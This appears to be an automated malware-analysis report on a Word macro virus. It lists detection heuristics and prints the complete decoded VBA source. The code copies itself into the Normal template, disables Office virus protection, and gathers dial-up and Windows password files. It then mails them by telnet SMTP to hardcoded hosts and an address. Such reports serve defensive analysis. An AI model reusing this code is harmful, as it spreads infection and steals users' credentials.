MALICIOUS
366
Risk Score
Heuristics 10
-
ClamAV: Doc.Trojan.NPR-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.NPR-2
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "telnet", 0 -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Bare IPv4 address in VBA string literal (3 addresses) low OLE_VBA_BARE_IPV4_LITERALVBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://194.186.182.26 Referenced by macro
- http://195.75.32.20Referenced by macro
- http://194.67.1.159Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42850 bytes |
SHA-256: 6a95cc981eadf04a89e478d0b1993fa33e18a7df3a46b417de401b1815d93865 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MSPlus"
Option Explicit
Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hWnd As Long, ByVal Msg As Long, wParam As Any, lParam As Any) As Long
Declare Function FindWindow Lib "user32.dll" Alias _
"FindWindowA" (ByVal lpClassName As Any, _
ByVal lpWindowName As Any) As Long
Sub AutoOpen()
Dim Yes As Boolean
Dim Source As String
Dim VBComponent As Object
On Error Resume Next
ActiveDocument.ShowSpellingErrors = False
ActiveDocument.ShowGrammaticalErrors = False
Source = MacroContainer.FullName
Yes = False
For Each VBComponent In NormalTemplate.VBProject.VBComponents
If VBComponent.Name = "MSPlus" Then
Yes = True
End If
Next
If Yes = False Then
CopyModule NormalTemplate.FullName, Source
End If
Options.VirusProtection = False
Options.SaveNormalPrompt = False
NormalTemplate.Save
End Sub
Sub CopyModule(Target As String, Source_ As String)
Dim VBComponent As Object
On Error Resume Next
Application.OrganizerCopy _
Source:=Source_, _
Destination:=Target, _
Name:="MSPlus", _
Object:=wdOrganizerObjectProjectItems
For Each VBComponent In MacroContainer.VBProject.VBComponents
If VBComponent.Name <> "ThisDocument" Then
Application.OrganizerCopy _
Source:=Source_, _
Destination:=Target, _
Name:=VBComponent.Name, _
Object:=wdOrganizerObjectProjectItems
End If
Next
End Sub
Sub AutoExit()
Application.Visible = False
Tmsn
End Sub
Sub FileOpen()
AutoOpen
Dialogs(80).Show
Tmsn
End Sub
Sub FileSave()
On Error Resume Next
ActiveDocument.Save
Tmsn
End Sub
Sub FileClose()
On Error Resume Next
AutoOpen
ActiveDocument.Close
End Sub
Sub AutoClose()
AutoOpen
End Sub
Sub Tmsn()
Dim Delta As Integer
Dim Old As Byte
Dim NF As Integer
NF = FreeFile
On Error Resume Next
Open "c:\windows\logow.sys" For Binary Access Read As #NF
Get #NF, 76989, Old
Close #NF
Delta = Val(Mid(Date$, 4, 2))
Delta = Delta - Old
Select Case Delta
Case Is > 2
Sender
Case Is < 0 And Delta + 31 > 2
Sender
Case Else
End Select
End Sub
Sub Sender()
Dim Handle As Long
Dim HandleBW As Long
Dim hWnd As Long
Dim FileName As String
Dim Start As Long
Dim MyDat As Byte
Dim i As Integer
Dim NPwl() As String
Dim j As Integer
Dim Title As String
Dim SMTP As String
Dim Host(1 To 5) As String
Dim A() As Integer
Dim f As Integer
Dim NF As Integer
Dim THwnd As Long
Dim TWnd As String
Dim None As String
On Error Resume Next
If Chkip > 400 Then
Host(1) = "chat.ru"
Host(2) = "mail.iname.com"
Host(3) = "194.186.182.26"
Host(4) = "195.75.32.20"
Host(5) = "194.67.1.159"
Loto 5, A()
For f = 1 To 5
Shell "telnet", 0
THwnd = FindWindow(CLng(0), "Telnet - (none)")
If THwnd <> 0 Then
TWnd = "telnet"
None = "(none)"
Else
THwnd = FindWindow(CLng(0), "Òåëíåò - (íåò)")
If THwnd <> 0 Then
TWnd = "Òåëíåò - "
None = "(íåò)"
Else
THwnd = FindWindow(CLng(0), "Telnet - (íåò)")
TWnd = "telnet - "
None = "(íåò)"
End If
End If
SendMessage THwnd, CLng(16), ByVal CLng(0), 0
Shell "telnet " + Host(A(f)) + " 25", 0
DoEvents
Start = Timer
Do Until Handle <> 0 Or Timer - Start > 60 Or HandleBW <> 0
Handle = FindWindow(CLng(0), TWnd + " - " + Host(A(f)))
HandleBW = FindWindow(CLng(0), "Connect failed")
DoEvents
Loop
Select Case Handle
Case Is <> 0
SMTP = "helo selena#$mail from: <cookie@mail.ru>#rcpt to: <kashek@usa.net>#$data#$Date: " + _
Date$ + " " + Time$ + "#X-MSMail-Priority: Normal#X-Priority: 3#X-Mailer: Post Messenger 3.1#MIME-Version: 1.0#Content-Type: multipart/mixed; boundary=" _
+ Chr(34) + "----=_NextPart" + Chr(34) + "#Content-Transfer-Encoding: 7bit##------=_NextPart#Content-Type: text/plain; charset=Windows-1251#Content-Transfer-Encoding: base64#"
Filler SMTP, Handle
Pause 1
Grab FileName
SMTP = Base64(FileName)
Kill "c:\windows\" + FileName
SMTP = Adapt(SMTP)
Filler SMTP, Handle
Pause 1
FindPWL i, NPwl()
If i <> 0 Then
For j = 0 To i - 1
If FileLen("c:\windows\" + NPwl(j)) <> 688 Then
SMTP = Base64(NPwl(j))
SMTP = Adapt(SMTP)
Title = "#------=_NextPart#Content-Type: application/octet-stream; name=" + Chr(34) _
+ NPwl(j) + Chr(34) + "#Content-Transfer-Encoding: base64#Content-Description: " + _
NPwl(j) + "(PWL PassWord List)#Content-Disposition: attachment; filename=" _
+ Chr(34) + NPwl(j) + Chr(34) + "#"
Filler Title, Handle
Pause 1
Filler SMTP, Handle
Pause 1
End If
Next
End If
Title = "##------=_NextPart--#.#quit#"
Filler Title, Handle
Pause 1
Start = Timer
Do Until hWnd <> 0 Or Timer - Start > 150
hWnd = FindWindow(CLng(0), TWnd)
DoEvents
Loop
Select Case hWnd
Case Is = 0
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Handle = 0
Case Else
SendMessage hWnd, CLng(16), ByVal CLng(0), 0
NF = FreeFile
MyDat = Val(Mid(Date$, 4, 2))
Open "c:\windows\logow.sys" For Binary Access Write As #NF
Put #NF, 76989, MyDat
Close #NF
DoEvents
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Exit Sub
End Select
Case Else
Handle = FindWindow(CLng(0), TWnd + " - " + None)
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Handle = 0
End Select
Next
End If
End Sub
Function Chkip()
Dim hWnd As Long
Dim Start As Long
Dim A As Long
Dim i As Long
Dim NF As Integer
Dim NF1 As Integer
On Error Resume Next
NF = FreeFile
Open "c:\windows\chkip.bat" For Output Access Write As #NF
Print #NF, "route print > c:\windows\chkip.bmp"
Close #NF
Shell "c:\windows\chkip.bat", 0
Start = Timer
Do While FindWindow(CLng(0), "(Ñåàíñ çàâåðøåí) - chkip") = 0
DoEvents
If Timer > Start + 10 Then
Exit Function
End If
Loop
hWnd = FindWindow(CLng(0), "(Ñåàíñ çàâåðøåí) - chkip")
SendMessage hWnd, CLng(16), ByVal CLng(0), 0
Chkip = FileLen("c:\windows\chkip.bmp")
A = 255
NF = FreeFile
Open "c:\windows\chkip.bat" For Binary Access Write As #NF
NF1 = FreeFile
Open "c:\windows\chkip.bmp" For Binary Access Write As #NF1
For i = 1 To LOF(NF)
Put #NF, i, A
Next
For i = 1 To LOF(NF1)
Put #NF1, i, A
Next
Close #NF
Close #NF1
Kill "c:\windows\chkip.bat"
Kill "c:\windows\chkip.bmp"
End Function
Function Loto(i As Integer, A() As Integer)
Dim n As Integer
ReDim A(1 To i) As Integer
Dim Tmp As Integer
Dim Temp As Integer
For n = 1 To i
A(n) = n
Next
For n = 1 To i
Tmp = Int((i - n + 1) * Rnd + n)
Temp = A(n)
A(n) = A(Tmp)
A(Tmp) = Temp
Next
End Function
Sub Filler(MessStr As String, hWnd As Long)
Dim i As Long
Dim Tmp As String
Dim Charset As Long
On Error Resume Next
For i = 1 To Len(MessStr)
Tmp = Mid(MessStr, i, 1)
Select Case Tmp
Case Is = "#"
DoEvents
Charset = SendMessage(hWnd, &H102, ByVal CLng(13), 0)
Case Is = "$"
Pause 7
Case Else
Charset = SendMessage(hWnd, &H102, ByVal CLng(Asc(Tmp)), 0)
End Select
Next
End Sub
Sub Pause(i As Byte)
Dim Start As Long
Start = Timer
Do While Timer < Start + i
DoEvents
Loop
End Sub
Function Grab(Name As String)
Dim Tmp As String
Dim AZ As String
Dim i As Integer
Dim Num As Integer
Dim PwdLst As String
Dim Temp As String
Dim Counter As Long
Dim NF As Integer
Dim NF1 As Integer
AZ = "abcdifghijklmnopqastuvwxyz"
For i = 1 To 7
Num = Random1(25)
Name = Name + Mid(AZ, Num + 1, 1)
Next
Name = Name + ".egn"
On Error Resume Next
NF1 = FreeFile
Open "c:\windows\" + Name For Output Access Write As #NF1
If Dir$("c:\windows\edialer.ini") <> "" Then
NF = FreeFile
Open "c:\windows\edialer.ini" For Input Access Read As #NF
Do While Not EOF(NF)
Line Input #NF, Tmp
If InStr(1, Tmp, "[RAS_Entry_") <> 0 Or _
InStr(1, Tmp, "PasswordSaved") <> 0 Or _
InStr(1, Tmp, "LoginSaved") <> 0 Then
Print #NF1, Tmp
End If
Loop
Close #NF
End If
If Dir$("C:\Windows\system.ini") <> "" Then
NF = FreeFile
Open "C:\Windows\system.ini" For Input Access Read As #NF
Do While Not EOF(NF)
Line Input #NF, Temp
Counter = Counter + 1
If Temp = "[Password Lists]" Then
Do While Temp <> ""
Line Input #NF, Temp
PwdLst = PwdLst + Chr(10) + Temp
Loop
Exit Do
End If
If Counter Mod 20 = 0 Then
DoEvents
End If
Loop
End If
Close #NF
Print #NF1, PwdLst
Close #NF1
End Function
Function Base64(FName As String)
Dim i As Long
Dim ABC As String
Dim Tmp As String
Dim Char As Byte
Dim Cod As Integer
Dim Roll As Integer
Dim Counter As Long
'
Dim HMask As Integer
Dim LMask As Integer
Dim Shift As Integer
Dim NF As Integer
HMask = 252
LMask = 3
Shift = 16
Roll = 0
Counter = 1
ABC = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
NF = FreeFile
On Error Resume Next
Open "c:\windows\" + FName For Binary Access Read As #NF
For i = 1 To LOF(NF)
Get #NF, Counter, Char
Cod = ((Char And HMask) \ (LMask + 1)) Or Roll
Roll = (Char And LMask) * Shift
Tmp = Tmp + Mid$(ABC, Cod + 1, 1)
HMask = HMask * 4 And 255
LMask = LMask * 4 + 3
Shift = Shift \ 4
If HMask = 0 Then
Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
HMask = 252
LMask = 3
Shift = 16
Roll = 0
End If
Counter = Counter + 1
Next
Close #NF
If Shift < 16 Then
Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
End If
Cod = ((Len(Tmp)) Mod 4)
If Cod Then
Tmp = Tmp + String$(4 - Cod, "=")
End If
Base64 = Tmp
End Function
Function FindPWL(j As Integer, FindFiles() As String)
ReDim FindFiles(0)
FindFiles(0) = Dir$("c:\windows\*.pwl")
If FindFiles(0) = "" Then
Exit Function
End If
j = 0
Do While FindFiles(0) <> ""
FindFiles(0) = Dir
j = j + 1
Loop
If j > 1 Then
ReDim FindFiles(0 To j - 1)
FindFiles(0) = Dir$("c:\windows\*.pwl")
For j = 1 To j - 1
FindFiles(j) = Dir$
Next j
Else
FindFiles(0) = Dir$("c:\windows\*.pwl")
End If
End Function
Function Adapt(Cod As String)
Dim PostCod As String
Dim i As Long
On Error Resume Next
For i = 1 To Len(Cod)
If i >= 76 And (i Mod 76) = 0 Then
PostCod = PostCod + Mid(Cod, i, 1) + "#"
Else
PostCod = PostCod + Mid(Cod, i, 1)
End If
Next
Adapt = "#" + PostCod + "#"
End Function
Function Random1(i As Integer)
Dim Resalt As Integer
Resalt = Int(i * Rnd + 1)
Random1 = Resalt
End Function
Sub ViewVBCode()
Deleter
ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
Deleter
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub Deleter()
Dim TempPath As String, TempName As String
Dim Docum As Object
Dim VBComp As Object
On Error Resume Next
For Each VBComp In NormalTemplate.VBProject.VBComponents
If VBComp.Name <> "ThisDocument" Then
With NormalTemplate.VBProject.VBComponents(VBComp.Name).CodeModule
.DeleteLines 1, .CountOfLines
End With
Application.OrganizerDelete NormalTemplate.Name, VBComp.Name, wdOrganizerObjectProjectItems
End If
Next
For Each VBComp In ActiveDocument.VBProject.VBComponents
Debug.Print VBComp.Name
If VBComp.Name <> "ThisDocument" Then
With ActiveDocument.VBProject.VBComponents(VBComp.Name).CodeModule
.DeleteLines 1, .CountOfLines
End With
Application.OrganizerDelete ActiveDocument.Name, VBComp.Name, wdOrganizerObjectProjectItems
End If
Next
Options.SaveNormalPrompt = True
End Sub
Sub ToolsOptions()
With Options
.VirusProtection = True
.SaveNormalPrompt = True
End With
Dialogs(wdDialogToolsOptions).Show
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub
' Processing file: /tmp/qstore_xoflb61h
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/MSPlus - 23684 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Declare Function SendMessage Lib "user32.dll" (ByVal hWnd As Long, ByVal Msg As Long, wParam As , lParam As ) As Long)
' Line #2:
' LineCont 0x0008 06 00 00 00 0D 00 00 00
' FuncDefn (Declare Function FindWindow Lib "user32.dll" (ByVal lpClassName As , ByVal lpWindowName As ) As Long)
' Line #3:
' FuncDefn (Sub AutoOpen())
' Line #4:
' Dim
' VarDefn Yes (As Boolean)
' Line #5:
' Dim
' VarDefn Source (As String)
' Line #6:
' Dim
' VarDefn VBComponent (As Object)
' Line #7:
' OnError (Resume Next)
' Line #8:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ShowSpellingErrors
' Line #9:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ShowGrammaticalErrors
' Line #10:
' Ld MacroContainer
' MemLd FullName
' St Source
' Line #11:
' LitVarSpecial (False)
' St Yes
' Line #12:
' StartForVariable
' Ld VBComponent
' EndForVariable
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #13:
' Ld VBComponent
' MemLd New
' LitStr 0x0006 "MSPlus"
' Eq
' IfBlock
' Line #14:
' LitVarSpecial (True)
' St Yes
' Line #15:
' EndIfBlock
' Line #16:
' StartForVariable
' Next
' Line #17:
' Ld Yes
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #18:
' Ld NormalTemplate
' MemLd FullName
' Ld Source
' ArgsCall CopyModule 0x0002
' Line #19:
' EndIfBlock
' Line #20:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #21:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #22:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #23:
' EndSub
' Line #24:
' FuncDefn (Sub CopyModule(Target As String, Source_ As String))
' Line #25:
' Dim
' VarDefn VBComponent (As Object)
' Line #26:
' OnError (Resume Next)
' Line #27:
' LineCont 0x0010 03 00 02 00 07 00 02 00 0B 00 02 00 0F 00 02 00
' Ld Source_
' ParamNamed Source
' Ld Target
' ParamNamed Destination
' LitStr 0x0006 "MSPlus"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #28:
' StartForVariable
' Ld VBComponent
' EndForVariable
' Ld MacroContainer
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #29:
' Ld VBComponent
' MemLd New
' LitStr 0x000C "ThisDocument"
' Ne
' IfBlock
' Line #30:
' LineCont 0x0010 03 00 04 00 07 00 04 00 0B 00 04 00 11 00 04 00
' Ld Source_
' ParamNamed Source
' Ld Target
' ParamNamed Destination
' Ld VBComponent
' MemLd New
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #31:
' EndIfBlock
' Line #32:
' StartForVariable
' Next
' Line #33:
' Line #34:
' EndSub
' Line #35:
' FuncDefn (Sub AutoExit())
' Line #36:
' LitVarSpecial (False)
' Ld Application
' MemSt Visible
' Line #37:
' ArgsCall Tmsn 0x0000
' Line #38:
' EndSub
' Line #39:
' FuncDefn (Sub FileOpen())
' Line #40:
' ArgsCall AutoOpen 0x0000
' Line #41:
' LitDI2 0x0050
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #42:
' ArgsCall Tmsn 0x0000
' Line #43:
' EndSub
' Line #44:
' FuncDefn (Sub FileSave())
' Line #45:
' OnError (Resume Next)
' Line #46:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #47:
' ArgsCall Tmsn 0x0000
' Line #48:
' EndSub
' Line #49:
' FuncDefn (Sub FileClose())
' Line #50:
' OnError (Resume Next)
' Line #51:
' ArgsCall AutoOpen 0x0000
' Line #52:
' Ld ActiveDocument
' ArgsMemCall Close 0x0000
' Line #53:
' EndSub
' Line #54:
' FuncDefn (Sub AutoClose())
' Line #55:
' ArgsCall AutoOpen 0x0000
' Line #56:
' EndSub
' Line #57:
' FuncDefn (Sub Tmsn())
' Line #58:
' Dim
' VarDefn Delta (As Integer)
' Line #59:
' Dim
' VarDefn Old (As Byte)
' Line #60:
' Dim
' VarDefn NF (As Integer)
' Line #61:
' Ld Friend
' St NF
' Line #62:
' OnError (Resume Next)
' Line #63:
' LitStr 0x0014 "c:\windows\logow.sys"
' Ld NF
' Sharp
' LitDefault
' Open (For Binary Access Read)
' Line #64:
' Ld NF
' Sharp
' LitDI4 0x2CBD 0x0001
' Ld Old
' GetRec
' Line #65:
' Ld NF
' Sharp
' Close 0x0001
' Line #66:
' Ld Date$
' LitDI2 0x0004
' LitDI2 0x0002
' ArgsLd Mid$ 0x0003
' ArgsLd Val 0x0001
' St Delta
' Line #67:
' Ld Delta
' Ld Old
' Sub
' St Delta
' Line #68:
' Ld Delta
' SelectCase
' Line #69:
' LitDI2 0x0002
' CaseGt
' CaseDone
' Line #70:
' ArgsCall Sender 0x0000
' Line #71:
' LitDI2 0x0000
' Ld Delta
' LitDI2 0x001F
' Add
' LitDI2 0x0002
' Gt
' And
' CaseLt
' CaseDone
' Line #72:
' ArgsCall Sender 0x0000
' Line #73:
' CaseElse
' Line #74:
' EndSelect
' Line #75:
' EndSub
' Line #76:
' FuncDefn (Sub Sender())
' Line #77:
' Dim
' VarDefn Handle (As Long)
' Line #78:
' Dim
' VarDefn HandleBW (As Long)
' Line #79:
' Dim
' VarDefn hWnd (As Long)
' Line #80:
' Dim
' VarDefn FileName (As String)
' Line #81:
' Dim
' VarDefn Start (As Long)
' Line #82:
' Dim
' VarDefn MyDat (As Byte)
' Line #83:
' Dim
' VarDefn i (As Integer)
' Line #84:
' Dim
' VarDefn NPwl (As String)
' Line #85:
' Dim
' VarDefn j (As Integer)
' Line #86:
' Dim
' VarDefn Title (As String)
' Line #87:
' Dim
' VarDefn SMTP (As String)
' Line #88:
' Dim
' LitDI2 0x0001
' LitDI2 0x0005
' VarDefn Host (As String)
' Line #89:
' Dim
' VarDefn A (As Integer)
' Line #90:
' Dim
' VarDefn False (As Integer)
' Line #91:
' Dim
' VarDefn NF (As Integer)
' Line #92:
' Dim
' VarDefn THwnd (As Long)
' Line #93:
' Dim
' VarDefn TWnd (As String)
' Line #94:
' Dim
' VarDefn None (As String)
' Line #95:
' OnError (Resume Next)
' Line #96:
' Ld Chkip
' LitDI2 0x0190
' Gt
' IfBlock
' Line #97:
' LitStr 0x0007 "chat.ru"
' LitDI2 0x0001
' ArgsSt Host 0x0001
' Line #98:
' LitStr 0x000E "mail.iname.com"
' LitDI2 0x0002
' ArgsSt Host 0x0001
' Line #99:
' LitStr 0x000E "194.186.182.26"
' LitDI2 0x0003
' ArgsSt Host 0x0001
' Line #100:
' LitStr 0x000C "195.75.32.20"
' LitDI2 0x0004
' ArgsSt Host 0x0001
' Line #101:
' LitStr 0x000C "194.67.1.159"
' LitDI2 0x0005
' ArgsSt Host 0x0001
' Line #102:
' LitDI2 0x0005
' ArgsLd A 0x0000
' ArgsCall Loto 0x0002
' Line #103:
' StartForVariable
' Ld False
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0005
' For
' Line #104:
' LitStr 0x0006 "telnet"
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #105:
' LitDI2 0x0000
' Coerce (Lng)
' LitStr 0x000F "Telnet - (none)"
' ArgsLd FindWindow 0x0002
' St THwnd
' Line #106:
' Ld THwnd
' LitDI2 0x0000
' Ne
' IfBlock
' Line #107:
' LitStr 0x0006 "telnet"
' St TWnd
' Line #108:
' LitStr 0x0006 "(none)"
' St None
' Line #109:
' ElseBlock
' Line #110:
' LitDI2 0x0000
' Coerce (Lng)
' LitStr 0x000E "Òåëíåò - (íåò)"
' ArgsLd FindWindow 0x0002
' St THwnd
' Line #111:
' Ld THwnd
' LitDI2 0x0000
' Ne
' IfBlock
' Line #112:
' LitStr 0x0009 "Òåëíåò - "
' St TWnd
' Line #113:
' LitStr 0x0005 "(íåò)"
' St None
' Line #114:
' ElseBlock
' Line #115:
' LitDI2 0x0000
' Coerce (Lng)
' LitStr 0x000E "Telnet - (íåò)"
' ArgsLd FindWindow 0x0002
' St THwnd
' Line #116:
' LitStr 0x0009 "telnet - "
' St TWnd
' Line #117:
' LitStr 0x0005 "(íåò)"
' St None
' Line #118:
' EndIfBlock
' Line #119:
' EndIfBlock
' Line #120:
' Ld THwnd
' LitDI2 0x0010
' Coerce (Lng)
' LitDI2 0x0000
' Coerce (Lng)
' ParamByVal
' LitDI2 0x0000
' ArgsCall SendMessage 0x0004
' Line #121:
' LitStr 0x0007 "telnet "
' Ld False
' ArgsLd A 0x0001
' ArgsLd Host 0x0001
' Add
' LitStr 0x0003 " 25"
' Add
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #122:
' ArgsCall DoEvents 0x0000
' Line #123:
' Ld Timer
' St Start
' Line #124:
' Ld Handle
' LitDI2 0x0000
' Ne
' Ld Timer
' Ld Start
' Sub
' LitDI2 0x003C
' Gt
' Or
' Ld HandleBW
' LitDI2 0x0000
' Ne
' Or
' DoUnitil
' Line #125:
' LitDI2 0x0000
' Coerce (Lng)
' Ld TWnd
' LitStr 0x0003 " - "
' Add
' Ld False
' ArgsLd A 0x0001
' ArgsLd Host 0x0001
' Add
' ArgsLd FindWindow 0x0002
' St Handle
' Line #126:
' LitDI2 0x0000
' Coerce (Lng)
' LitStr 0x000E "Connect failed"
' ArgsLd FindWindow 0x0002
' St HandleBW
' Line #127:
' ArgsCall DoEvents 0x0000
' Line #128:
' Loop
' Line #129:
' Ld Handle
' SelectCase
' Line #130:
' LitDI2 0x0000
' CaseNe
' CaseDone
' Line #131:
' LineCont 0x0008 04 00 01 00 0B 00 01 00
' LitStr 0x0050 "helo selena#$mail from: <cookie@mail.ru>#rcpt to: <kashek@usa.net>#$data#$Date: "
' Ld Date$
' Add
' LitStr 0x0001 " "
' Add
' Ld Time$
' Add
' LitStr 0x0080 "#X-MSMail-Priority: Normal#X-Priority: 3#X-Mailer: Post Messenger 3.1#MIME-Version: 1.0#Content-Type: multipart/mixed; boundary="
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x000E "----=_NextPart"
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0084 "#Content-Transfer-Encoding: 7bit##------=_NextPart#Content-Type: text/plain; charset=Windows-1251#Content-Transfer-Encoding: base64#"
' Add
' St SMTP
' Line #132:
' Ld SMTP
' Ld Handle
' ArgsCall Filler 0x0002
' Line #133:
' LitDI2 0x0001
' ArgsCall Pause 0x0001
' Line #134:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.